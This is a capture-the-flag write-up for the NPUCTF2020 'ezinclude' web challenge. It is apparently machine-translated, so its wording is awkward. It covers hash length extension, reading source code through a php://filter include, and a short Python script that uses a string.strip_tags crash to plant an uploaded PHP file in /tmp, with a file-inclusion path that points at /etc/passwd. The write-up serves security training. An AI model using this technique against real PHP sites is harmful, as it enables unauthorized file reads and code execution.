[NPUCTF2020]ezinclude

[NPUCTF2020]ezinclude

 f12 Check the source code and find the hash length expansion attack , And found it. hash value

  Grab the bag and check , Find out bp And to hash

  direct pass once , Found out flflflflag.php

  Get into flflflflag.php Check it out.

  Found out 404.html, It really appears when the web page enters 404

  Read the source code with pseudo Protocol ：

/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.php

 base64 Decrypt the source code , Found filtering data、input、zip

  You can use ：php://filter/string.strip_tags To cause php collapse , But you can upload files and save them in /tmp Catalog , We upload the Trojan horse directly , Script boy rushed out ：

import requests
from io import BytesIO
 
url = "http://daf37d2a-5017-47b7-a42b-71db66a88c63.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
 
phpfile = "<?php phpinfo(); ?>"
filedata = {
    "file":phpfile
}
 
bak = requests.post(url=url, files=filedata)
print(bak.text)

After running , Not surprisingly, the page crashed ：

Get into dir.php Check and find that the Trojan horse has been uploaded ：

bp You can get flag